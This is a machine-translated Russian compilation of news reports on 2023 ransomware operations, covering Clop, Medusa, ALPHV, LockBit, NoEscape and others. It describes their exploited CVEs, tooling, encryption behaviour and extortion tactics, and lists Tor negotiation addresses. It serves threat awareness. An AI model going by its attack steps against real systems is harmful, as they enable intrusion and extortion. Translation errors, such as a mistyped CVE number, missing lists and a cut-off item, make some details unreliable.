Они также утверждали, что они могут перемещаться по боковым направлениям через сети своих жертв и развернуть полезные нагрузки вымогателей, чтобы зашифровать системы, но решили не делать этого и только украли документы, хранящиеся на скомпрометированных GoAnywhere MFT.
Группа отказалась предоставить доказательства или поделиться дополнительной информацией о своих вторжения, когда BleepingComputer спросил их, когда начались атаки, если они уже начали вымогать своих жертв, и какие выкупы они просили.
BleepingComputer не мог самостоятельно подтвердить действия Clop, и Forta не ответил на электронные письма с просьбой получить дополнительную информацию о эксплуатации CVE-2013-0669 и обвинениях группы вымогателей,
Разработчик Goanywhere MFT Fortra (ранее известный как Helpsystems) на прошлой неделе сообщил своим клиентам, что уязвимость эксплуатируется как нулевой день в дикой природе.
На следующий день компания выпустила обновления аварийной безопасности, чтобы позволить клиентам защитить свои серверы от входящих попыток атаки.
«Мы определили, что несанкционированная сторона получила доступ к системам через ранее неизвестный эксплойт и создала несанкционированные учетные записи пользователей», - сказал Fortra.
CISA также добавил уязвимость CVE-2023-0669 Goanywhere MFT в свой известный каталог эксплуатируемых уязвимостей в пятницу, приказывая федеральным агентствам исправлять свои системы в течение следующих трех недель, до 3 марта.
В то время как Shodan показывает, что более 1000 экземпляров Goanywhere, доступных из интернета, только 135 находятся на портах 8000 и 8001 (те, которые используются уязвимой консоли администратора).
https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-it-breached-130-orgs-using-goanywhere-zero-day/
В феврале разработчики решения для передачи файлов GoAnywhere MFT предупредили клиентов о том, что на открытых административных консолях используется уязвимость нулевого дня для удаленного выполнения кода.
GoAnywhere — это решение для безопасной передачи файлов через Интернет, которое позволяет компаниям безопасно передавать зашифрованные файлы своим партнерам, сохраняя при этом подробные журналы аудита того, кто получил доступ к файлам.
Хотя никаких подробностей о том, как использовалась уязвимость, не сообщалось, вскоре был выпущен экспериментальный эксплойт, а затем исправление для этой уязвимости.
На следующий день после выпуска патча GoAnywhere кибергруппа Clop заявила, что несет ответственность за атаки.
Группа заявила, что они использовали уязвимость в течение десяти дней, чтобы украсть данные у 130 компаний.
С тех пор две компании, Community Health Systems (CHS) и Hatch Bank, сообщили, что данные были украдены в ходе атак GoAnywhere MFT.
Клоп начинает вымогать деньги у клиентов GoAnywhere
Недавно Clop начал публично эксплуатировать жертв атак GoAnywhere, добавив семь новых компаний на свой сайт утечки данных.
Общеизвестно, что только одна из жертв, Hatch Bank, была взломана с помощью этой уязвимости.
Хотя неясно, сколько требуют злоумышленники, ранее в декабре 2020 года они требовали выкуп в размере 10 миллионов долларов в аналогичных атаках с использованием уязвимости нулевого дня Accellion FTA.
Во время этих атак группа вымогателей украла большие объемы данных почти у 100 компаний по всему миру, при этом злоумышленники медленно сливали данные из компаний, требуя выкупа в миллионы долларов.
В число организаций, чьи серверы Accellion были взломаны, входят, среди прочего, энергетический гигант Shell, фирма по кибербезопасности Qualys, гигант супермаркетов Kroger и несколько университетов по всему миру, таких как Стэнфордский медицинский университет, Университет Колорадо, Университет Майами, Калифорнийский университет и Университет Мэриленда. Балтимор (UMB).
https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-begins-extorting-goanywhere-zero-day-victims/
Medusa Ransomware, начала набирать обороты в 2023 году, нацеленная на корпоративных жертв по всему миру с требованиями выкупа на миллионы долларов.
Операция «Медуза» началась в июне 2021 года, но ее активность была относительно низкой, жертв было немного. Однако в 2023 году группа активизировалась и запустила «блог Медузы», используемый для утечки данных о жертвах, отказавшихся платить выкуп.
На этой неделе Medusa привлекла внимание СМИ после того, как они взяли на себя ответственность за нападение на район государственных школ Миннеаполиса (MPS) и поделились видео с украденными данными.
Из-за часто используемого имени были некоторые запутанные отчеты об этом семействе программ-вымогателей, и многие думали, что это то же самое, что и MedusaLocker.
Однако действия программ-вымогателей Medusa и MedusaLocker совершенно разные.
Операция MedusaLocker была запущена в 2019 году как Ransomware-as-a-Service с многочисленными аффилированными лицами, запиской о выкупе, обычно называемой How_to_back_files.html, и широким спектром расширений файлов для зашифрованных файлов.
Операция MedusaLocker использует для переговоров веб-сайт Tor по адресу qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion.
Однако операция по вымогательству Medusa началась примерно в июне 2021 года и использовала записку с требованием выкупа под названием !!!READ_ME_MEDUSA!!!.txt и статическое зашифрованное расширение файла .MEDUSA.
Операция Medusa также использует веб-сайт Tor для переговоров о выкупе, но их сайт находится по адресу medusacegu2ufmc3kx2kkqicrlcxdettsjcenhjena6uannk5f4ffuyd.onion.
Как Medusa шифрует Windows-устройства
BleepingComputer смог проанализировать шифратор Medusa только для Windows, и пока неизвестно, есть ли у них такой шифратор для Linux.
Шифровальщик Windows принимает параметры командной строки, которые позволяют злоумышленнику настроить способ шифрования файлов на устройстве, как показано ниже.
При обычном запуске без аргументов командной строки программа-вымогатель Medusa завершит работу более 280 служб и процессов Windows для программ, которые могут препятствовать шифрованию файлов. К ним относятся службы Windows для почтовых серверов, серверов баз данных, серверов резервного копирования и программного обеспечения для обеспечения безопасности.
Затем программа-вымогатель удалит теневые копии томов Windows, чтобы предотвратить их использование для восстановления файлов.
Эксперт по программам-вымогателям Майкл Гиллеспи также проанализировал шифровальщик и сообщил BleepingComputer, что он шифрует файлы, используя шифрование AES-256 + RSA-2048 с использованием библиотеки BCrypt.
Гиллеспи также подтвердил, что метод шифрования, используемый в Medusa, отличается от метода, используемого в MedusaLocker.
При шифровании файлов программа-вымогатель будет добавлять расширение .MEDUSA к именам зашифрованных файлов
В каждой папке программа-вымогатель создаст заметку о выкупе с именем !!!READ_ME_MEDUSA!!!.txt, содержащую информацию о том, что случилось с файлами жертвы.
Записка о выкупе также будет включать контактную информацию расширения, в том числе сайт утечки данных Tor, сайт переговоров Tor, канал Telegram, идентификатор Tox и адрес электронной почты [email protected].
Сайт переговоров Tor находится по адресу http://medusacegu2ufmc3kx2kkqicrlcxdettsjcenhjena6uannk5f4ffuyd.onion.
В качестве дополнительного шага, чтобы предотвратить восстановление файлов из резервных копий, программа-вымогатель Medusa выполнит следующую команду, чтобы удалить локально сохраненные файлы, связанные с программами резервного копирования, такими как Windows Backup. Эта команда также удалит виртуальные жесткие диски (VHD), используемые виртуальными машинами.
https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/
Появилась новая кибергруппа под названием «Money Message», нацеленная на жертв по всему миру и требующая выкупа в миллионы долларов за то, чтобы не произошла утечка данных и за выпуск дешифратора.
О новой программе-вымогателе впервые появилось сообщение на форумах BleepingComputer 28 марта 2023 года, а ThreatLabz Zscaler вскоре после публикации информации в Twitter.
В настоящее время злоумышленник перечисляет на своем сайте вымогателей двух жертв, одной из которых является азиатская авиакомпания с годовым доходом около 1 миллиарда долларов. Кроме того, злоумышленники утверждают, что украли у компании файлы, и в качестве доказательства нарушения прикрепляют скриншот файловой системы, к которой был получен доступ.
Как Money Message шифрует компьютер
Шифровальщик написан на C++ и включает в себя встроенный файл конфигурации JSON, определяющий способ шифрования устройства.
Этот файл конфигурации включает в себя, какие папки блокировать от шифрования, какое расширение добавлять, какие службы и процессы следует завершать, включено ли ведение журнала, а также имена и пароли для входа в домен, которые, вероятно, используются для шифрования других устройств.
В образце, проанализированном BleepingComputer, программа-вымогатель не будет шифровать файлы в следующих папках:
При запуске он удалит копии теневых томов с помощью следующей команды: Программа-вымогатель завершит следующие процессы: Затем программа-вымогатель отключает следующие службы Windows: При шифровании файлов расширение не добавляется, но это может измениться в зависимости от жертвы. По словам исследователя безопасности, шифровальщик использует шифрование ChaCha20/ECDH при шифровании файлов.
Единственными файлами, исключенными из шифрования по умолчанию, являются: После шифрования устройства программа-вымогатель создаст записку с требованием выкупа с именем money_message.log, содержащую ссылку на сайт переговоров TOR, используемый для переговоров с злоумышленниками.
Программа-вымогатель также предупредит, что опубликует любые украденные данные на своем сайте утечки данных, если выкуп не будет выплачен.
Хотя шифратор, используемый группой, не выглядит сложным, было подтверждено, что операция успешно крадет данные и шифрует устройства во время их атак.
https://www.bleepingcomputer.com/news/security/new-money-message-ransomware-demands-million-dollar-ransoms/
Было замечено, что операторы ALPHV/BlackCat использует три уязвимости, влияющие на продукт Veritas Backup для начального доступа к целевой сети.
Операция по вымогательству ALPHV началась в декабре 2021 года и, как считается, управляется бывшими участниками программ Darkside и Blackmatter, которые были внезапно закрыты, чтобы избежать давления со стороны правоохранительных органов.
Mandiant отслеживает филиал ALPHV как «UNC4466» и отмечает, что этот метод представляет собой отклонение от типичного вторжения, основанного на украденных учетных данных.
Используемые недостатки
Mandiant сообщает, что 22 октября 2022 года она наблюдала первые случаи эксплуатации уязвимостей Veritas в дикой природе. Уязвимости с высокой степенью серьезности, на которые нацелен UNC4466:
CVE-2021-27876: Уязвимость произвольного доступа к файлам, вызванная ошибкой в схеме аутентификации SHA, позволяет удаленному злоумышленнику получить несанкционированный доступ к уязвимым конечным точкам. (оценка CVSS: 8,1)
CVE-2021-27877: Удаленный несанкционированный доступ и выполнение привилегированных команд агенту BE через аутентификацию SHA. (оценка CVSS: 8,2)
CVE-2021-27878: Уязвимость выполнения произвольной команды возникает из-за ошибки в схеме аутентификации SHA, что позволяет удаленному злоумышленнику получить несанкционированный доступ к уязвимым конечным точкам. (оценка CVSS: 8,8)
Все три недостатка влияют на программное обеспечение Veritas Backup. Поставщик раскрыл их в марте 2021 года и выпустил исправление с версией 21.2. Однако, несмотря на то, что с тех пор прошло более двух лет, многие конечные точки остаются уязвимыми, поскольку они не обновлены до безопасной версии.
Mandiant говорит, что коммерческая служба сканирования показала, что в общедоступной сети есть более 8500 IP-адресов, которые рекламируют службу «Symantec/Veritas Backup Exec ndmp» на порту по умолчанию 10000, а также на портах 9000 и 10001.
«Хотя этот результат поиска не идентифицирует напрямую уязвимые системы, поскольку версии приложений не удалось идентифицировать, он демонстрирует преобладание экземпляров, открытых в Интернете, которые потенциально могут быть исследованы злоумышленниками», — Mandiant.
Согласно Mandiant, UNC4466 начал использовать конкретный модуль через месяц после того, как он стал доступен.
Детали атаки
Согласно наблюдениям Mandiant, UNC4466 компрометирует открытый в Интернете сервер Windows, на котором работает Veritas Backup Exec, с помощью общедоступного модуля Metasploit и поддерживает постоянный доступ к хосту.
После первоначальной компрометации злоумышленник использовал утилиты Advanced IP Scanner и ADRecon для сбора информации о среде жертвы.
Затем они загрузили на хост дополнительные инструменты, такие как LAZAGNE, LIGOLO, WINSW, RCLONE и, наконец, шифровальщик вымогателя ALPHV через фоновую интеллектуальную службу передачи (BITS).
Злоумышленник использовал туннелирование SOCKS5 для связи с сервером управления и контроля (C2).
Исследователи объясняют, что UNC4466 использовал передачу BITS для загрузки инструментов туннелирования SOCKS5 и развернул полезную нагрузку программы-вымогателя, добавив немедленные задачи в политику домена по умолчанию, отключив программное обеспечение безопасности и запустив шифратор.
Чтобы повысить привилегии, UNC4466 использует Mimikatz, LaZagne и Nanodump для кражи действительных учетных данных пользователя.
Наконец, субъект угрозы уклоняется от обнаружения, очищая журналы событий и отключая функцию мониторинга Microsoft Defender в реальном времени.
Отчет Mandiant содержит рекомендации, которым защитники могут следовать, чтобы своевременно обнаруживать атаки UNC4466 и смягчать их до того, как полезная нагрузка ALPHV будет выполнена в их системах.
https://www.bleepingcomputer.com/news/security/alphv-ransomware-exploits-veritas-backup-exec-bugs-for-initial-access/
LockBit впервые создала шифровальщики, нацеленные на Mac, что, вероятно, станет первой крупной операцией по вымогательству, специально предназначенной для macOS.
Новые шифровальщики были обнаружены исследователем кибербезопасности MalwareHunterTeam, который нашел на VirusTotal ZIP-архив, который, по-видимому, содержал большинство доступных шифровальщиков LockBit.
Исторически сложилось так, что операция LockBit использует шифраторы, предназначенные для атак на серверы Windows, Linux и VMware ESXi. Однако, как показано ниже, этот архив [VirusTotal] также содержал ранее неизвестные шифраторы для процессоров macOS, ARM, FreeBSD, MIPS и SPARC.
Эти шифраторы также включают один с именем «locker_Apple_M1_64» [VirusTotal], который нацелен на более новые компьютеры Mac, работающие на Apple Silicon. В архиве также есть локеры для процессоров PowerPC, которые используют старые Mac.
Дальнейшее исследование, проведенное исследователем кибербезопасности Флорианом Ротом, обнаружило шифратор Apple M1, загруженный на VirusTotal в декабре 2022 года, что указывает на то, что эти образцы уже некоторое время циркулируют.
https://www.bleepingcomputer.com/news/security/lockbit-ransomware-encryptors-found-targeting-mac-devices/
Microsoft объяснила недавние атаки на серверы Papercut к операциям вымогателей Clop и Lockbit, которые использовали уязвимости для кражи корпоративных данных.
В прошлом месяце на сервере приложений PaperCut были исправлены две уязвимости, которые позволяют удаленным злоумышленникам произвести неавторизованное выполнение удаленного кода и раскрытие информации:
CVE-2023–27350 / ZDI-CAN-18987 / PO-1216: Недостоверное избавление от удаленного выполнения кода, влияющее на все версии Papercut MF или NG 8.0 или более поздней версии на всех платформах ОС, как для серверов применения, так и для серверов сайта. (CVSS v3.1 Оценка: 9,8 - критическая)
CVE-2023–27351 / ZDI-CAN-19226 / PO-1219: Недостаточный недостаток информации о раскрытии информации, влияющий на все версии Papercut MF или NG 15.0 или позже на платформах ОС для серверов приложений. (CVSS v3.1 Оценка: 8,2 - высокая)
19 апреля PaperCut сообщил, что эти недостатки активно эксплуатировались в дикой природе, призывая администраторов обновить свои серверы до последней версии.
POC эксплойт для использования данного RCE был выпущен через несколько дней, что позволило актерам угроз атаковать серверы, используя эти эксплойты.
После того, как они получили доступ к серверу, они развернули вредоносное ПО TrueBot, которая также была ранее связана с операцией вымогателей Clop.
В конечном счете, Microsoft говорит, что маяк Cobalt Strike был развернут и использовался для распространения в боковом направлении через сеть при краже данных с использованием приложения Megasync File.
В дополнение к CLOP, Microsoft говорит, что некоторые вторжения привели к атакам вымогателей Lockbit. Тем не менее, неясно, начались ли эти атаки после того, как эксплойты были опубликованы.
Microsoft рекомендует администраторам применять доступные патчи как можно скорее, так как другие актеры угроз, вероятно, начнут использовать уязвимости.
Все организации, использующие Papercut MF или NG, настоятельно рекомендуются перейти на версии 20.1.7, 21.2.11 и 22.0.9 немедленно и позже, чтобы исправить эти уязвимости.
https://www.bleepingcomputer.com/news/security/clop-lockbit-ransomware-gangs-behind-papercut-server-attacks/
расследует утечку предполагаемых закрытых ключей, используемых функцией безопасности Intel Boot Guard, что может повлиять на ее способность блокировать установку вредоносного встроенного ПО UEFI на устройства MSI.
В марте группа ransomware атаковала компьютерное оборудование производителя MSI, заявив, что во время атаки украла 1,5 ТБ данных, включая прошивку, исходный код и базы данных.
Злоумышленники потребовали выкуп в размере 4 000 000 долларов и, не получив денег, начала сливать данные для MSI на своем сайте утечки данных.
На прошлой неделе злоумышленники начали утечку украденных данных MSI, включая исходный код прошивки, используемой материнскими платами компании.
Intel Boot Guard пострадал от атаки
В пятницу Алекс Матросов, генеральный директор платформы безопасности цепочки поставок микропрограмм Binarly, предупредил, что утечка исходного кода содержит закрытые ключи для подписи изображений для 57 продуктов MSI и закрытые ключи Intel Boot Guard для 116 продуктов MSI.
«Компания Intel знает об этих отчетах и ведет активное расследование. Исследователи утверждают, что в данные включены закрытые ключи подписи, в том числе ключи подписи MSI OEM для Intel® BootGuard», — сообщила Intel BleepingComputer в ответ на наши вопросы об утечке.
Матросов сказал, что эта утечка могла привести к тому, что Intel Boot Guard не работал на устройствах MSI, использующих процессоры «11th Tiger Lake, 12th Adler Lake и 13th Raptor Lake».
«Утечка ключей Intel Boot Guard влияет на всю экосистему (не только на MSI) и делает эту функцию безопасности бесполезной».
Это связано с тем, что вредоносная прошивка загружается до загрузки операционной системы, что позволяет ей скрыть свою деятельность от ядра и программного обеспечения безопасности, сохраняется даже после переустановки операционной системы и помогает установить вредоносное ПО на скомпрометированные устройства.
Для защиты от вредоносной микропрограммы Intel Boot Guard проверяет, подписан ли образ микропрограммы с помощью законного закрытого ключа подписи с использованием встроенного открытого ключа, встроенного в оборудование Intel.
Если микропрограмму можно проверить как законно подписанную, Intel Boot Guard разрешит ее загрузку на устройство. Однако, если подпись не пройдена, прошивка не сможет загрузиться.
Самая большая проблема с этой утечкой заключается в том, что открытые ключи, используемые для проверки прошивки, подписанной с использованием утекших ключей, как полагают, встроены в оборудование Intel. Если их нельзя изменить, функция безопасности больше не заслуживает доверия на устройствах, использующих эти украденные ключи.
«В утечке исходного кода MSI были обнаружены закрытые ключи манифеста (KM) и манифеста политики загрузки (BPM). Эти ключи используются для технологии Boot Guard, которая обеспечивает проверку образа прошивки с помощью аппаратного корня доверия», — предупреждает Binarly в бюллетене. поделился в Твиттере.
«Хеш открытого ключа OEM Root RSA от менеджера KM запрограммирован в программируемом поле набора микросхем (FPF). Основная цель KM — сохранить хэш открытого ключа RSA из BPM, который, в свою очередь, содержит информацию о загрузке Политика, описание начального загрузочного блока (IBB) и его хэш».
Хотя эти ключи вряд ли помогут большинству злоумышленников, некоторые опытные злоумышленники ранее использовали в атаках вредоносные микропрограммы, такие как вредоносное ПО CosmicStrand и BlackLotus UEFI.
Binarly опубликовала список затронутого оборудования MSI, включающий 116 устройств MSI, которые, как сообщается, были скомпрометированы утечкой ключей Intel Boot Guard.
https://www.bleepingcomputer.com/news/security/intel-investigating-leak-of-intel-boot-guard-private-keys-after-msi-breach/
Все большее число операций с программами-вымогателями используют просочившийся исходный код программы-вымогателя Babuk для создания шифровальщиков Linux, нацеленных на серверы VMware ESXi.
Исследователи безопасности SentinelLabs заметили эту растущую тенденцию после того, как заметили быструю смену девяти вариантов программ-вымогателей на основе Babuk, появившихся в период между второй половиной 2022 года и первой половиной 2023 года.
«Существует заметная тенденция к тому, что злоумышленники все чаще используют конструктор Babuk для разработки программ-вымогателей для ESXi и Linux», — сказал Алекс Деламотт, исследователь угроз из SentinelLabs.
Список новых семейств программ-вымогателей, которые использовали его для создания новых шифраторов ESXi на основе Babuk со второго полугодия 2022 года (и соответствующие расширения, добавленные к зашифрованным файлам), включает Play (.FinDom), Mario (.emario), Conti POC (.conti). , REvil, также известный как Revix (.rhkrc), программа-вымогатель Cylance, Dataf Locker, Rorschach, также известный как BabLock, Lock4 и RTM Locker.
К сожалению, его использование другими семействами программ-вымогателей также значительно усложнило идентификацию виновных в атаках, поскольку использование одних и тех же инструментов несколькими участниками значительно усложняет усилия по атрибуции.
Они добавляются ко многим другим уникальным штаммам программ-вымогателей, не основанным на Babuk, нацеленным на виртуальные машины VMware ESXi, обнаруженным в дикой природе в течение нескольких лет.
Утечка исходного кода и ключей дешифрования
Операция по вымогательству Babuk (также известная как Babyk и Babuk Locker) всплыла в начале 2021 года, когда компании были атакованы двойным вымогательством.
https://www.bleepingcomputer.com/news/security/babuk-code-used-by-9-ransomware-gangs-to-encrypt-vmware-esxi-servers/
Было замечено, что группа вымогателей ALPHV (также известная как BlackCat) использует подписанные вредоносные драйверы ядра Windows, чтобы избежать обнаружения программным обеспечением безопасности во время атак.
Драйвер, обнаруженный Trend Micro, представляет собой улучшенную версию вредоносного ПО, известного как «POORTRY», которое Microsoft, Mandiant, Sophos и SentinelOne обнаружили в атаках программ-вымогателей в конце прошлого года.
Вредоносная программа POORTRY представляет собой драйвер ядра Windows, подписанный с использованием украденных ключей, принадлежащих законным учетным записям в программе Microsoft Windows Hardware Developer Program.
Этот вредоносный драйвер использовался хакерской группой UNC3944, также известной как 0ktapus и Scattered Spider, для прерывания работы программного обеспечения безопасности, работающего на устройстве Windows, чтобы избежать обнаружения.
Хотя программное обеспечение безопасности обычно защищено от прерывания или подделки, поскольку драйверы ядра Windows работают с самыми высокими привилегиями в операционной системе, их можно использовать для завершения практически любого процесса.
Trend Micro сообщает, что злоумышленники пытались использовать драйвер POORTRY, подписанный Microsoft, но показатели его обнаружения были высокими после того, как он получил огласку и после того, как ключи для подписи кода были отозваны.
Следовательно, хакеры развернули обновленную версию драйвера ядра POORTRY, подписанную с использованием украденного или просочившегося сертификата перекрестной подписи.
Новый драйвер, используемый программой-вымогателем BlackCat, помогает им повысить свои привилегии на скомпрометированных машинах, а затем остановить процессы, связанные с агентами безопасности.
Вредоносный драйвер ядра Windows
Аналитики говорят, что цифровая подпись ktgn.sys была отозвана; однако драйвер по-прежнему без проблем загружается в 64-разрядных системах Windows с принудительными политиками подписи.
«Из нашего анализа того, что происходит, когда пользователь взаимодействует с этим драйвером, мы заметили, что он использует только один из открытых кодов управления вводом и выводом устройства (IOCTL) — Kill Process, который используется для уничтожения процессов агента безопасности, установленных в системе. », — поясняется в отчете Trend Micro.
Аналитики Trend Micro обнаружили незащищенные следующие команды, которые могут быть отправлены драйверу:
Trend Micro отмечает, что две команды, используемые для обратных вызовов Process/Thread Notification, не работают, что указывает на то, что драйвер в настоящее время находится в стадии разработки или тестирования.
Системным администраторам рекомендуется использовать индикаторы компрометации, используемые Trend Micro, и добавлять вредоносные драйверы, используемые злоумышленниками-вымогателями, в черный список драйверов Windows.
Администраторы Windows также должны убедиться, что включено «Принудительное применение подписи драйверов», что блокирует установку любых драйверов, не имеющих действительной цифровой подписи.
https://www.bleepingcomputer.com/news/security/malicious-windows-kernel-drivers-used-in-blackcat-ransomware-attacks/
Clop сообщила, что они стоят за атаками с целью кражи данных MOVEit Transfer, когда использовалась уязвимость нулевого дня для взлома серверов нескольких компаний и кражи данных.
Представитель Clop также подтвердил, что они начали использовать уязвимость 27 мая, во время долгого празднования Дня поминовения в США, как ранее сообщал Mandiant.
Проведение атак в праздничные дни — обычная тактика для операции по вымогательству Clop, которая ранее предпринимала крупномасштабные атаки в праздничные дни, когда персонал был минимальным.
Например, они использовали аналогичную уязвимость нулевого дня Accellion FTA 23 декабря 2020 года, чтобы украсть данные прямо в начале рождественских каникул.
Хотя Clop не сообщил количество организаций, взломанных в результате атак MOVEit Transfer, они сказали, что жертвы будут отображаться на их сайте утечки данных, если выкуп не будет выплачен.
Кроме того, кибергруппа подтвердила, что они не начали вымогать деньги у жертв, вероятно, используя время для просмотра данных и определения того, что является ценным и как это можно использовать для получения выкупа от взломанных компаний.
В недавних атаках на GoAnywhere MFT Clop ждал более месяца, чтобы отправить организациям требования о выкупе по электронной почте.
В конце концов, и без подсказки, кибергруппа сообщила, что они удалили все данные, украденные у правительств, военных и детских больниц во время этих атак.
«Я хочу вам сразу сказать, что военные, детские больницы, правительство и т. д., подобные этому, мы не атаковали, и их данные были стерты», — сказал Clop в своем электронном письме.
Хотя Clop начинался как операция по вымогательству, группа ранее сообщила BleepingComputer, что они отходят от шифрования и вместо этого предпочитают вымогательство с целью кражи данных.
Появляются первые жертвы
Мы также увидели наши первые раскрытия от организаций, взломанных в результате атак кражи данных Clop MOVEit.
Британский поставщик решений для расчета заработной платы и управления персоналом Zellis подтвердил, что из-за этих атак у него произошла утечка данных, которая также затронула некоторых его клиентов.
«Большое количество компаний по всему миру пострадало от уязвимости нулевого дня в продукте Progress Software MOVEit Transfer», — сказал Зеллис в заявлении BleepingComputer.
К сожалению, как мы видели в предыдущих атаках Clop на управляемые платформы передачи файлов, со временем мы, вероятно, увидим длинный поток раскрытий информации от компаний.
https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-moveit-extortion-attacks/
Clop начала вымогать деньги у компаний, пострадавших от атак кражи данных MOVEit, сначала перечислив названия компаний на сайте утечки данных — часто используемая тактика перед публичным раскрытием украденной информации.
Эти записи появились после того, как 27 мая злоумышленники воспользовались уязвимостью нулевого дня в платформе безопасной передачи файлов MOVEit Transfer для кражи файлов, хранящихся на сервере.
Clop взял на себя ответственность за атаки, заявив, что взломал «сотни компаний», и предупредив, что их имена будут добавлены на сайт утечки данных 14 июня, если переговоры не состоятся.
По словам злоумышленников, если требование о вымогательстве не будет оплачено, они начнут публиковать украденные данные 21 июня.
Уже раскрытые утечки данных
Другие организации, которые уже раскрыли нарушения MOVEit Transfer, включают Zellis (BBC, Boots и Aer Lingus, Ирландская ВШЭ через Zellis), Университет Рочестера, правительство Новой Шотландии, американский штат Миссури, американский штат Иллинойс, BORN Ontario, Ofcam, Extreme Networks и Американский совет по внутренним болезням.
В прошлых подобных атаках с использованием уязвимостей нулевого дня в Accellion FTA, GoAnywhere MFT и атаках с управляемой передачей файлов SolarWinds Serv-U злоумышленники требовали выкуп в размере 10 миллионов долларов, чтобы предотвратить утечку данных.
https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-starts-extorting-moveit-data-theft-victims/
Группа вымогателей BlackCat (также известная как ALPHV) проводит вредоносные кампании, чтобы заманить людей на поддельные страницы, которые имитируют официальный сайт приложения для передачи файлов WinSCP для Windows, но вместо этого продвигают установщики, зараженные вредоносным ПО.
WinSCP (Windows Secure Copy) — это популярный бесплатный клиент SFTP, FTP, S3, SCP и файловый менеджер с открытым исходным кодом с возможностями передачи файлов SSH, который загружается 400 000 раз в неделю только на SourceForge.
BlackCat использует программу как приманку, чтобы потенциально заразить компьютеры системных администраторов, веб-администраторов и ИТ-специалистов для первоначального доступа к ценным корпоративным сетям.
Этот ранее неизвестный вектор заражения вымогателем ALPHV был обнаружен аналитиками Trend Micro, которые заметили рекламные кампании, продвигающие поддельные страницы на поисковых страницах Google и Bing.
От WinSCP к CobaltStrike
Атака BlackCat, начинается с того, что жертва ищет «WinSCP Download» в Bing или Google и получает продвигаемые вредоносные результаты, которые ранжируются выше безопасных сайтов загрузки WinSCP.
Жертвы нажимают на эти объявления и посещают веб-сайт, на котором размещены учебные пособия по выполнению автоматической передачи файлов с помощью WinSCP.
Эти сайты не содержат ничего вредоносного и, вероятно, не обнаруживаются поисковыми роботами Google, но перенаправляют посетителей на клон официального веб-сайта WinSCP с кнопкой загрузки. Эти клоны используют доменные имена, аналогичные реальному домену winscp.net для утилиты, например winscp[.]com.
Жертва нажимает кнопку и получает файл ISO, содержащий «setup.exe» и «msi.dll», первый из которых является приманкой для запуска пользователем, а второй — дроппером вредоносного ПО, запускаемым исполняемым файлом.
«После запуска setup.exe он вызовет msi.dll, который позже извлечет папку Python из раздела DLL RCDATA в качестве реального установщика для WinSCP, который будет установлен на машине».
Этот процесс также устанавливает троянизированную python310.dll и создает механизм сохраняемости, создавая ключ запуска с именем «Python» и значением «C:\Users\Public\Music\python\pythonw.exe».
Исполняемый файл pythonw.exe загружает модифицированную запутанную python310.dll, содержащую маяк Cobalt Strike, который подключается к адресу сервера управления и контроля.
Другие инструменты, используемые ALPHV
Имея в системе запущенный Cobalt Strike, легко выполнять дополнительные скрипты, извлекать инструменты для бокового перемещения и вообще углублять компрометацию.
Аналитики Trend Micro заметили, что на последующих этапах операторы ALPHV использовали следующие инструменты:
Наряду с вышеупомянутыми инструментами ALPHV также использовал SpyBoy «Терминатор», EDR и антивирусный блокировщик, продаваемый злоумышленниками на русскоязычных хакерских форумах за 3000 долларов.
Недавнее исследование CrowdStrike подтвердило, что «Терминатор» способен обходить несколько инструментов безопасности Windows, используя механизм «принеси свой собственный уязвимый драйвер» (BYOVD) для повышения привилегий в системе и их деактивации.
Trend Micro заявляет, что связывает вышеуказанные TTP с подтвержденным заражением программами-вымогателями ALPHV.
https://www.bleepingcomputer.com/news/security/blackcat-ransomware-pushes-cobalt-strike-via-winscp-search-ads/
Новая операция по вымогательству NoEscape считается ребрендингом Avaddon, которая закрылась и выпустила свои ключи дешифрования в 2021 году.
NoEscape был запущен в июне 2023 года, когда он начал атаковать предприятия с помощью двойного вымогательства. В рамках этих атак злоумышленники крадут данные и шифруют файлы на серверах Windows, Linux и VMware ESXi.
Затем злоумышленники угрожают публично раскрыть украденные данные, если выкуп не будет выплачен. BleepingComputer известно о требованиях программы-вымогателя NoEscape от сотен тысяч до более чем 10 миллионов долларов.
Известно, что NoEscape не позволяет своим членам нацеливаться на страны СНГ (бывшего Советского Союза), а жертвы из этих стран получают бесплатные дешифраторы и информацию о том, как они были взломаны.
В настоящее время NoEscape перечислила десять компаний из разных стран и отраслей на своем сайте утечки данных, показывая, что они не нацелены на конкретную вертикаль.
Ребрендинг Avaddon
Операция по вымогательству Avaddon была запущена в июне 2020 года с использованием фишинговых кампаний, нацеленных на корпоративных жертв.
Однако в июне 2021 года Avaddon внезапно прекратила свою деятельность и поделилась ключами дешифрования жертв с BleepingComputer в анонимном сообщении.
С тех пор не было никаких известных программ-вымогателей, связанных с субъектами угроз, до прошлого месяца, когда была запущена операция NoEscape.
Создатель ID-Ransomware и эксперт по программам-вымогателям Майкл Гиллеспи сообщил, что программы-шифровальщики NoEscape и Avaddon практически идентичны, за исключением одного заметного изменения в алгоритмах шифрования.
Ранее шифровальщик Avaddon использовал AES для шифрования файлов, а NoEscape переключился на алгоритм Salsa20.
В остальном шифраторы практически идентичны, с почти идентичными логикой шифрования и форматами файлов, включая уникальный способ «разбиения больших двоичных объектов, зашифрованных RSA».
Шифровальщик NoEscape
При выполнении NoEscape выполнит следующие команды для удаления теневых копий томов Windows, локальных каталогов резервных копий Windows и отключения автоматического восстановления Windows.
Затем шифратор начнет завершать следующие процессы, в том числе связанные с программным обеспечением безопасности, приложениями резервного копирования, а также веб-серверами и серверами баз данных.
Это также остановит следующие службы Windows, связанные с базами данных, QuickBooks, программным обеспечением безопасности и платформами виртуальных машин.
Программа-вымогатель завершает работу этих приложений, чтобы разблокировать файлы, которые можно открыть и предотвратить шифрование.
Однако, даже если файлы заблокированы, шифровальщик использует API диспетчера перезагрузки Windows, чтобы закрыть процессы или отключить службы Windows, которые могут оставить файл открытым и предотвратить шифрование.
При шифровании файлов шифратор пропустит все файлы со следующими расширениями:
Также будут пропущены файлы в папках, имена которых содержат следующие строки:
Во время шифрования Гиллеспи говорит, что его можно настроить на использование трех режимов:
Полный — весь файл зашифрован
Частичное — шифруются только первые X мегабайт.
Chunked — использует прерывистое шифрование для шифрования фрагментов данных.
Однако NoEscape включает параметр конфигурации, который заставляет шифратор полностью шифровать файлы с расширениями файлов accdb, edb, mdb, mdf, mds, ndf и sql.
